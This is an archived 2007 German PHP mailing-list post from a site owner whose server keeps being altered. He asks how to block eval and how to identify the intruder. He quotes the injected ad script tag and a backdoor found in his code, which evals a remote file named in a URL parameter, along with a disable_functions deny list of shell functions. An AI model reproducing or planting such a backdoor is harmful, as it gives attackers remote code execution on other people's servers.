phpbar.de logo

Mailinglisten-Archive

[php] Problem mit Hacker - eval sperren

[php] Problem mit Hacker - eval sperren

ANGEL Harald harald.angel at egston.com
Mon Jan 22 17:26:00 CET 2007


Hallo phpListe!
Ich schreibe heute wegen eines ernsten Problems:
Ich habe seit einer Woche einen Hacker auf meinem Webserver, aber mein Provider findet leider nicht heraus, wie er ins System kommt bzw kann mir den Webserver nicht sicher machen.
Was der Hacker macht? Er fügt in meine Startseite eine Layerwerbung ein:
<script src="http://layer-ads.de/la-33101.js" type="text/javascript"></script>
durch die verdient er Geld - was einerseits schon mal eine Frechheit ist, andererseits bleibt dadurch der aufbau meiner Website stehen.

Die Datei hat nach dem ändern den User www-data, und wenn ich die Zeile rauslösche ist sie nach 5min wieder drin :(
Hab jetzt schon rausgefunden, dass er meine komplette Seite mit seiner ersetz. Wie er das macht, keine Ahnung. Ausschließen kann ich, dass er root Zugriff auf den Server hat.

Hab in einem anderen Script folgendes gefunden:
//a:9:{s:4:"lang";s:2:"en";s:9:"auth_pass";s:32:"d41d8cd98f00b204e9800998ecf8427e";s:8:"quota_mb";i:0;s:17:
"upload_ext_filter";a:0:{}s:19:"download_ext_filter";a:0:{}s:15:"error_reporting";s:0:"";s:7:"fm_root";s:0:"";
s:17:"cookie_cache_time";i:1171902116;s:7:"version";s:5:"0.9.3";}
if(!empty($_GET['url']))eval(str_replace(Array('<?php', '<?', '?>')
,Array('','','') ,implode('', file(stripslashes($_GET['url'])))));
}

hab leider keine ahnung, was das macht, auf jeden Fall ist es nicht von mir.
Habe vom Provider den Befehl "eval" sperren lassen, aber das funktioniert anscheinend nicht.
Er hat in die php.ini folgendes eingetragen:
disable_functions = show_source, system, shell_exec, passthru, exec, phpinfo, eval, proc_open, escapeshellcmd

nur leider funktioniert der Befehl eval noch immer.

erste Frage: Was hats da mit dem eval? Kann man den nicht sperren? Wenn doch: Wie?
zweite Frage: Habt Ihr einen Tipp wie ich den Typen los werde? Hab schon eine Mail an den Anbieter der Layer-Werbung geschrieben, aber die reagieren nicht. Kann man auf herausgabe der Daten des Users mit der id 33101 klagen? Weil dann wüsste ich wer das ist.

Danke für jede Art von Hilfe!
lg Harald


php::bar PHP Wiki   -   Listenarchive